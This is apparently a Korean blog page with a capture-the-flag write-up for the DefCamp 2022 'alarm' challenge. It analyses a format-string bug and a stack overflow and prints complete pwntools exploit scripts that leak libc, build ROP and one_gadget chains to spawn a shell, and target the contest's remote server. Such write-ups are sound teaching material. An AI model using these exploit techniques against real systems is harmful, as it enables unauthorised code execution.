<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="분석 환경: Windows 11, Ubuntu 20.04사용자 제공 파일: 바이너리 해당 ctf에 pwn이 두 문제 나왔다. 이건 medium이다. Analysis보호 기법12345Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:">
<meta property="og:type" content="article">
<meta property="og:title" content="DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)">
<meta property="og:url" content="https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/index.html">
<meta property="og:site_name" content="jir4vvit">
<meta property="og:description" content="분석 환경: Windows 11, Ubuntu 20.04사용자 제공 파일: 바이너리 해당 ctf에 pwn이 두 문제 나왔다. 이건 medium이다. Analysis보호 기법12345Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-10-04T22:00:00.000Z">
<meta property="article:modified_time" content="2022-12-22T18:47:30.712Z">
<meta property="article:author" content="jir4vvit">
<meta property="article:tag" content="fsb">
<meta property="article:tag" content="D-CTF">
<meta property="article:tag" content="one_gadget">
<meta name="twitter:card" content="summary">
    
    
    <!-- title -->
    <title>DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2022/10/05/d-ctf2022-destruction/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2022/10/04/lakectf2022-porcosort/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&text=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&is_video=false&description=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)&body=Check out this article: https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&name=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&t=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">1.</span> <span class="toc-text">Analysis</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EB%B3%B4%ED%98%B8-%EA%B8%B0%EB%B2%95"><span class="toc-number">1.1.</span> <span class="toc-text">보호 기법</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EC%B7%A8%EC%95%BD%EC%A0%90"><span class="toc-number">1.2.</span> <span class="toc-text">취약점</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploit"><span class="toc-number">2.</span> <span class="toc-text">Exploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EC%8B%9C%EB%82%98%EB%A6%AC%EC%98%A4"><span class="toc-number">2.1.</span> <span class="toc-text">시나리오</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploit-Code-local-Ubuntu-20-04"><span class="toc-number">2.2.</span> <span class="toc-text">Exploit Code (local, Ubuntu 20.04)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#find-libc"><span class="toc-number">2.3.</span> <span class="toc-text">find libc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploit-Code-remote-Ubuntu-18-04"><span class="toc-number">2.4.</span> <span class="toc-text">Exploit Code (remote, Ubuntu 18.04)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tmi"><span class="toc-number">3.</span> <span class="toc-text">tmi</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">jir4vvit</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-10-04T22:00:00.000Z" itemprop="datePublished">2022-10-05</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/WriteUp/">WriteUp</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/D-CTF/" rel="tag">D-CTF</a>, <a class="tag-link-link" href="/tags/fsb/" rel="tag">fsb</a>, <a class="tag-link-link" href="/tags/one-gadget/" rel="tag">one_gadget</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>분석 환경: Windows 11, Ubuntu 20.04<br>사용자 제공 파일: 바이너리</p>
<p>해당 ctf에 pwn이 두 문제 나왔다. 이건 medium이다.</p>
<h2 id="Analysis"><a href="#Analysis" class="headerlink" title="Analysis"></a>Analysis</h2><h3 id="보호-기법"><a href="#보호-기법" class="headerlink" title="보호 기법"></a>보호 기법</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x3fe000)</span><br></pre></td></tr></table></figure>

<h3 id="취약점"><a href="#취약점" class="headerlink" title="취약점"></a>취약점</h3><p>IDA로 열어보면 되게 간단하다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">main</span><span class="params">(__int64 a1, <span class="type">char</span> **a2, <span class="type">char</span> **a3)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v4; <span class="comment">// [rsp+14h] [rbp-Ch] BYREF</span></span><br><span class="line">  <span class="type">int</span> buf; <span class="comment">// [rsp+18h] [rbp-8h] BYREF</span></span><br><span class="line">  <span class="type">int</span> fd; <span class="comment">// [rsp+1Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  sub_400807(a1, a2, a3);</span><br><span class="line">  fd = open(<span class="string">&quot;/dev/urandom&quot;</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">if</span> ( fd == <span class="number">-1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Open failed&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0xFFFFFFFF</span>LL;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( read(fd, &amp;buf, <span class="number">4uLL</span>) == <span class="number">4</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    close(fd);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Wellcome to the Alarm system!&quot;</span>);</span><br><span class="line">    fflush(<span class="built_in">stdout</span>);</span><br><span class="line">    fgets(byte_6010C0, <span class="number">1024</span>, <span class="built_in">stdin</span>);</span><br><span class="line">    <span class="built_in">printf</span>(byte_6010C0);                        <span class="comment">// fsb</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Unlock value of alarm: &quot;</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%x&quot;</span>, &amp;v4);</span><br><span class="line">    <span class="keyword">if</span> ( buf == v4 )</span><br><span class="line">      vuln(<span class="string">&quot;%x&quot;</span>);</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;UGVybWlzc2lvbiBkZW5pZWQhCg==\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Read failed\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0xFFFFFFFF</span>LL;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>fsb 취약점이 대놓고 보인다. 입력할 수 있는 바이트 수도 굉장히 넉넉하다.</p>
<p>바로 아래에서도 어떤 입력값 하나를 주고 그 입력값이 <code>/dev/urandom</code> 랜덤값과 같은지 비교한다. 같으면 <code>vuln</code> 함수가 실행되어 bof를 트리거할 수 있다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">sub_400861</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">112</span>]; <span class="comment">// [rsp+0h] [rbp-70h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Alarm set to @%p\n&quot;</span>, buf);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">5000uLL</span>);                        <span class="comment">// bof</span></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>fsb 취약점이 존재한다면 할 수 있는게 굉장히 많다. 예를 들면 스택 값 노출 정도?</p>
<p>이 문제에선 bof를 트리거하고 작성할 수 있는 바이트 수가 굉장히 넉넉하고, canary도 존재하지 않아 bof만 잘 트리거 된다면 무리없이 ROP를 진행할 수 있을 것이다.</p>
<p>bof를 트리거하기 위한 조건은 랜덤 값을 일치시켜야하는 것인데, 이 랜덤 값은 스택에 저장된다. 따라서 fsb로 랜덤 값을 알아낼 수 있다. </p>
<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h2><h3 id="시나리오"><a href="#시나리오" class="headerlink" title="시나리오"></a>시나리오</h3><ol>
<li>fsb를 이용하여 랜덤 값과 libc base 구하기</li>
<li>랜덤 값을 입력하여 bof 트리거</li>
<li>ROP!</li>
</ol>
<h3 id="Exploit-Code-local-Ubuntu-20-04"><a href="#Exploit-Code-local-Ubuntu-20-04" class="headerlink" title="Exploit Code (local, Ubuntu 20.04)"></a>Exploit Code (local, Ubuntu 20.04)</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./alarm&#x27;</span>)</span><br><span class="line"><span class="comment">#p = remote(&#x27;34.159.80.143&#x27;, 31776)</span></span><br><span class="line">e = ELF(<span class="string">&#x27;./alarm&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/usr/lib/x86_64-linux-gnu/libc-2.31.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;system!&#x27;</span>, <span class="string">&#x27;%p %9$p&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.recvline()</span><br><span class="line"></span><br><span class="line">leak = p.recvline().split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(leak)</span><br><span class="line"></span><br><span class="line">libc_leak = leak[<span class="number">0</span>]</span><br><span class="line">random_leak = leak[<span class="number">1</span>][:-<span class="number">1</span>] </span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&#x27;libc_leak :: &#x27;</span> + libc_leak)</span><br><span class="line">log.info(<span class="string">&#x27;random_leak :: &#x27;</span> + random_leak)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;alarm:&#x27;</span>, random_leak)</span><br><span class="line"></span><br><span class="line">libc_base = <span class="built_in">int</span>(libc_leak,<span class="number">16</span>) - <span class="number">131</span> - libc.symbols[<span class="string">&#x27;_IO_2_1_stdin_&#x27;</span>]</span><br><span class="line">log.info(<span class="string">&#x27;libc_base :: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">system = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh = libc_base + libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>()</span><br><span class="line"></span><br><span class="line">ret = libc_base + <span class="number">0x22679</span></span><br><span class="line">pop_rdi = libc_base + <span class="number">0x23b6a</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;&#x27;</span></span><br><span class="line">payload += <span class="string">&#x27;A&#x27;</span> * <span class="number">112</span> </span><br><span class="line">payload += <span class="string">&#x27;B&#x27;</span> * <span class="number">8</span></span><br><span class="line"><span class="comment">#payload += &#x27;C&#x27; * 8 # ret</span></span><br><span class="line">payload += p64(pop_rdi)</span><br><span class="line">payload += p64(binsh)</span><br><span class="line">payload += p64(ret)</span><br><span class="line">payload += p64(system)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="find-libc"><a href="#find-libc" class="headerlink" title="find libc"></a>find libc</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 랜덤 값 전송 후</span></span><br><span class="line">ret = <span class="number">0x40067e</span></span><br><span class="line">pop_rdi = <span class="number">0x400a23</span></span><br><span class="line">puts_got = e.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_plt = <span class="number">0x400690</span> <span class="comment">#e.plt[&#x27;puts&#x27;]</span></span><br><span class="line">open_got = e.got[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;&#x27;</span></span><br><span class="line">payload += <span class="string">&#x27;A&#x27;</span> * <span class="number">112</span> </span><br><span class="line">payload += <span class="string">&#x27;B&#x27;</span> * <span class="number">8</span></span><br><span class="line">payload += p64(pop_rdi)</span><br><span class="line">payload += p64(puts_got) <span class="comment"># open_got</span></span><br><span class="line">payload += p64(puts_plt)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">leak_addr = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">log.info(<span class="string">&#x27;leak addr: &#x27;</span> + <span class="built_in">hex</span>(leak_addr))</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">puts: 970</span><br><span class="line">open: bf0</span><br></pre></td></tr></table></figure>
<p>libc database site: <a target="_blank" rel="noopener" href="https://libcdb.konwur.de/">https://libcdb.konwur.de/</a></p>
<p>최종적으로 구한 libc version: <code>libc6_2.27-3ubuntu1.6_amd64.so</code></p>
<h3 id="Exploit-Code-remote-Ubuntu-18-04"><a href="#Exploit-Code-remote-Ubuntu-18-04" class="headerlink" title="Exploit Code (remote, Ubuntu 18.04)"></a>Exploit Code (remote, Ubuntu 18.04)</h3><p>remote libc가 Ubuntu 18.04의 libc 버전이라서 원가젯을 무리없이 사용할 수 있었다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&#x27;./alarm&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;34.159.80.143&#x27;</span>, <span class="number">31776</span></span><br><span class="line">e = ELF(<span class="string">&#x27;./alarm&#x27;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&#x27;/usr/lib/x86_64-linux-gnu/libc-2.31.so&#x27;)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.27.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;system!&#x27;</span>, <span class="string">&#x27;%11$p %9$p&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.recvline()</span><br><span class="line"></span><br><span class="line">leak = p.recvline().split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(leak)</span><br><span class="line"></span><br><span class="line">libc_leak = leak[<span class="number">0</span>]</span><br><span class="line">random_leak = leak[<span class="number">1</span>][:-<span class="number">1</span>] </span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&#x27;libc_leak :: &#x27;</span> + libc_leak)</span><br><span class="line">log.info(<span class="string">&#x27;random_leak :: &#x27;</span> + random_leak)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;alarm:&#x27;</span>, random_leak)</span><br><span class="line"></span><br><span class="line">libc_base = <span class="built_in">int</span>(libc_leak,<span class="number">16</span>) - <span class="number">231</span> - libc.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">log.info(<span class="string">&#x27;libc_base :: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">ret = <span class="number">0x40067e</span></span><br><span class="line">oneshot = libc_base+<span class="number">0x4f302</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;&#x27;</span></span><br><span class="line">payload += <span class="string">&#x27;A&#x27;</span> * <span class="number">112</span> </span><br><span class="line">payload += <span class="string">&#x27;B&#x27;</span> * <span class="number">8</span></span><br><span class="line"><span class="comment">#payload += p64(pop_rdi)</span></span><br><span class="line">payload += p64(ret)</span><br><span class="line">payload += p64(oneshot)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="tmi"><a href="#tmi" class="headerlink" title="tmi"></a>tmi</h2><p>사실 이 대회 기간 때 libc version 구하고 main으로 돌려서(?) 뭐 이것저것 삽질하다가 못풀었다 ㅋㅋ;; main으로 돌리니깐 rip가 맨 처음 보내준 랜덤 값으로 바뀌어서 다른 일을 잠깐 하러 갔다. 그런 사이 대회가 종료되어서 서버가 바로 닫혀버려서 remote shell은 따지 못하였다. 후..</p>
<p>창도 다 닫아버려서 libc 버전도 까먹었고, 서버도 닫혀서 offset도 구할 수 없어서 디코에 조심스럽게 libc 버전을 물어봤더니 <code>libc6_2.27-3ubuntu1.6_amd64.so</code> 라고 친절하게 알려주셨다. 그래서 바이너리를 patch하고 풀어보았다. </p>
<p>사실 이 과정에서 새로운 사실을 알게 되었다.</p>
<p>알려주신 libc 버전은 Ubuntu 18.04과 동일하다. 그래서 Ubuntu 18.04에서 libc와 ld를 가져왔다.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">jir4vvit@ubuntu:~/ctf/dctf/alarm$ ldd alarm</span><br><span class="line">	linux-vdso.so.1 (0x00007fff621e2000)</span><br><span class="line">	libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007f05fa6c9000)</span><br><span class="line">	/lib64/ld-linux-x86-64.so.2 (0x00007f05fa8cf000)</span><br><span class="line"></span><br><span class="line">jir4vvit@ubuntu:~/ctf/dctf/alarm$ ls</span><br><span class="line">alarm  ld-2.27.so  libc-2.27.so  local.py  remote.py</span><br></pre></td></tr></table></figure>

<p>patch를 하려는데 잘 안되어서 알아보니까 libc 이름을 <code>libc.so.6</code>으로 변경해야하더라.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">jir4vvit@ubuntu:~/ctf/dctf/alarm$ patchelf --set-rpath . --set-interpreter ./ld-2.27.so alarm</span><br><span class="line">jir4vvit@ubuntu:~/ctf/dctf/alarm$ cp libc-2.27.so libc.so.6</span><br><span class="line">jir4vvit@ubuntu:~/ctf/dctf/alarm$ patchelf --set-rpath . --replace-needed libc.so.6 ./libc.so.6 alarm</span><br><span class="line">jir4vvit@ubuntu:~/ctf/dctf/alarm$ ldd alarm</span><br><span class="line">	linux-vdso.so.1 (0x00007ffd5c699000)</span><br><span class="line">	./libc.so.6 (0x00007f32d2251000)</span><br><span class="line">	./ld-2.27.so =&gt; /lib64/ld-linux-x86-64.so.2 (0x00007f32d2644000)</span><br></pre></td></tr></table></figure>

<p>이렇게 remote의 바이너리로 patch해서 remote를 잘 해결할 수 있었다.</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tag</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
